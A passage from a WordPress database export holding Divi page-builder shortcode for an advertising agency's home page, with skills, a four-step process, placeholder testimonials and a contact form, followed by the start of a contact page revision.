animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" _builder_version=\"4.5.2\" custom_margin=\"||||false|false\" custom_padding=\"0px||0px|\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800..1.jpg\" title_text=\"800x800..1\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800.jpg\" title_text=\"800x800\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Button Section\" _builder_version=\"4.4.9\" background_color=\"#f7f7f7\" custom_padding=\"0px||50px||false|false\"][et_pb_row _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_button button_url=\"#\" button_text=\"See More\" button_alignment=\"center\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Skill Section\" _builder_version=\"4.4.9\" custom_padding=\"50px||50px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Skills</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.1\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>We have a dedicated team to build new tools and technique, to complete the day today repetitive work with precision.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Skill\" _builder_version=\"3.25\" custom_padding=\"20px||10px|\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"flip\" animation_intensity_flip=\"20%\"]<p>We have a dedicated inhouse talent to handle the various aspects of communication and digital advertising. Be it creative writing or eye catching graphic design. Our young and energetic team bring best and creative execution to all the ideas created.</p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_counters bar_bg_color=\"#d4b068\" use_percentages=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|||||\" title_text_color=\"#353740\" title_font_size=\"12px\" title_letter_spacing=\"1px\" title_line_height=\"2em\" percent_font_size=\"1px\" custom_padding=\"|||\" animation_style=\"fold\" animation_direction=\"left\" animation_intensity_fold=\"30%\"][et_pb_counter percent=\"90\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Branding - 90%\r[/et_pb_counter][et_pb_counter percent=\"77\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Lead/Sales Generation Campaign - 77%\r[/et_pb_counter][et_pb_counter percent=\"85%\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Digital Advertising - 85%\r[/et_pb_counter][/et_pb_counters][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Gradient Background Color Section\" _builder_version=\"4.5.2\" background_color_gradient_direction=\"90deg\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/Artboard-4.png\" custom_margin=\"||92px|||\" custom_margin_tablet=\"||0px|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"10%||0px|\"][et_pb_row _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Artboard-Copy-12-1.png\" alt=\"Best Advertising agency\" title_text=\"best-advertising-agency\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" custom_margin=\"||-56px|\" custom_margin_tablet=\"||10%|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"left\" animation_duration=\"1500ms\" animation_intensity_slide=\"10%\" animation_starting_opacity=\"100%\" locked=\"off\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Quote Section\" _builder_version=\"4.5.2\" custom_margin=\"40px||59px|||\" custom_margin_tablet=\"||0px||false|false\" custom_margin_phone=\"3px||0px||false|false\" custom_margin_last_edited=\"on|phone\" custom_padding=\"30px||0px||false|false\"][et_pb_row admin_label=\"Quote\" _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Quote\" _builder_version=\"4.5.2\" text_text_color=\"#747d88\" text_font_size=\"24px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"flip\" animation_direction=\"top\" animation_intensity_flip=\"20%\"]<p>NOBODY READS ADS, PEOPLE READ WHAT INTERESTS THEM &amp; SOMETIME IT\'S AN AD</p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"140px\" padding_top_2=\"0px\" padding_left_1=\"10%\" padding_1_tablet=\"\" padding_1_phone=\"0px|||10%|false|false\" padding_1_last_edited=\"on|phone\" admin_label=\"Feature Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"4.5.2\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_margin=\"|||\" custom_margin_tablet=\"\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"0px||3px|||\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"100px\" box_shadow_color=\"#ffffff\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_left__hover=\"10%\" padding_top__hover=\"140px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Feature Titile\" _builder_version=\"3.25\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"||10px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2><span>Easy to start</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<div class=\"lp-element lp-pom-text nlh\" id=\"lp-pom-text-216\">\n<p><strong><em>Just four steps</em></strong></p>\n<p><strong><em></em></strong></p>\n</div>\n<div class=\"lp-element lp-pom-text nlh\" id=\"lp-pom-text-217\">\n<p>We had adopted proven workflow to produce consistent result, but never hesitate to cross the lines and work differently.</p>\n</div>[/et_pb_text][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"4.5.2\" width=\"100%\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"|0px|4px|||\" hover_enabled=\"0\" custom_margin_last_edited=\"on|phone\" custom_margin_phone=\"|||30px|false|false\" custom_margin_tablet=\"|||40px|false|false\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"01. BRAND AUDIT\" use_icon=\"on\" font_icon=\"%%57%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_margin=\"||26px|||\" animation_style=\"fade\" animation_direction=\"bottom\"]<p style=\"text-align: center;\"><span>Analyzing the brand with all the key parameter (As per operating environment and competition)</span></p>[/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"02. STRATEGY\" use_icon=\"on\" font_icon=\"%%369%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" width=\"98.9%\" custom_margin=\"||26px||false|false\" custom_padding=\"||||false|false\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]<p><span>Starting with the summary of the plan, Defining TG, Writing/Creating USP</span></p>\n<p><span></span></p>[/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"4.5.2\" width=\"100%\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"|0px||||\" hover_enabled=\"0\" custom_margin_last_edited=\"on|phone\" custom_margin_phone=\"|||30px|false|false\" custom_margin_tablet=\"|||40px|false|false\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"03. EXECUTION\" use_icon=\"on\" font_icon=\"%%57%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_margin=\"||26px|||\" animation_style=\"fade\" animation_direction=\"bottom\"]<div><span>Creative Development, Setting up the visual identity, implementing the IMC(Integrated Marketing Communication)</span></div>[/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"04. EVALUATION\" use_icon=\"on\" font_icon=\"%%369%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" width=\"98.9%\" custom_margin=\"||43px||false|false\" custom_padding=\"||||false|false\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]<div dir=\"ltr\"><span>The fourth but the most important step is evaluation, adaptation and reporting. To improvise future performance.</span></div>\n<p><span></span></p>[/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Artboard-5-1.jpg\" alt=\"digital marketing agency\" title_text=\"digital-marketing-agency\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"6%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Testimonial Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"50px||50px|||\"][et_pb_row admin_label=\"Testimonial Title\" _builder_version=\"3.25\" custom_margin=\"|||\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat|on||on|\" text_text_color=\"#353740\" text_font_size=\"42px\" text_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\"]<p>From Our Clients</p>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"600px\" module_alignment=\"center\" custom_margin=\"|||\"]<p>Best Advertising Is Done By Satisfied Customers. We Believe &amp; Nurture It In Our Business.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Testimonial\" _builder_version=\"3.25\" custom_padding=\"|||\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Mitch Skolnik\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_2.png\" quote_icon=\"off\" _builder_version=\"4.5.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Andrel Nahaev\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_5.png\" quote_icon=\"off\" _builder_version=\"4.5.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Eduard Ungureanu\" job_title=\"Tech Support\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_1.png\" quote_icon=\"off\" _builder_version=\"4.5.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Tom Ewer\" job_title=\"Blogger\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_3.png\" quote_icon=\"off\" _builder_version=\"4.5.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Form Section\" _builder_version=\"4.4.9\" background_color=\"#d4b068\" custom_padding=\"50px||50px||false|false\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"10%\" saved_tabs=\"all\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Let\'s Start Something new<br /><span style=\"color: #FFF;\">Say Hello!</span></h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>We would love to connect up and join your brand journey. Do not hesitate to question/drop us a line, As discerning mind always take better decision.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Contact Form\" _builder_version=\"3.25\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_contact_form email=\"dhiraj@wthtest1.in8.cdn-alpha.com\" custom_message=\"Hi my name is %%Name%%, Email id is %%Email%% and Mobile No is %%Mobile_No%%, my message is %%Message%%\" submit_button_text=\"Send\" module_id=\"et_pb_contact_form_0\" _builder_version=\"4.5.2\" form_field_background_color=\"rgba(255,255,255,0)\" form_field_text_color=\"#353740\" form_field_font=\"Montserrat||||\" form_field_font_size=\"16px\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"5px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#ffffff\" max_width=\"800px\" module_alignment=\"center\" animation_style=\"fade\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-1px\" box_shadow_color=\"rgba(0,0,0,0.18)\" form_background_color=\"rgba(255,255,255,0)\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Mobile_No\" field_title=\"Mobile No\" min_length=\"10\" max_length=\"10\" allowed_symbols=\"numbers\" fullwidth_field=\"on\" _builder_version=\"4.5.2\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"4.4.9\" custom_margin=\"||60px|\" custom_padding=\"|||\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','134-revision-v1','','','2020-08-07 20:49:41','2020-08-07 20:49:41','',134,'https://wthtest1.in8.cdn-alpha.com/2020/08/07/134-revision-v1/',0,'revision','',0),(639,1,'2020-08-07 20:52:05','2020-08-07 20:52:05','[et_pb_section fb_built=\"1\" _builder_version=\"3.22\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/circle-background-pattern.png\" custom_padding=\"67px|0px|67.1875px|0px|false|false\" animation_style=\"zoom\" animation_intensity_zoom=\"4%\"][et_pb_row _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"3%\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"||||||||\" header_font=\"Montserrat|700||on|||||dotted\" header_text_color=\"#353740\" header_font_size=\"60px\" header_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_margin=\"|||\" animation_style=\"fade\" header_font_size_last_edited=\"off|desktop\" locked=\"off\"]<h1>COntact US</h1>[/et_pb_text][et_pb_divider show_divider=\"off\" disabled_on=\"on|on|off\" _builder_version=\"3.2\" max_width=\"120px\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"30%\"][/et_pb_divider][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Section\" 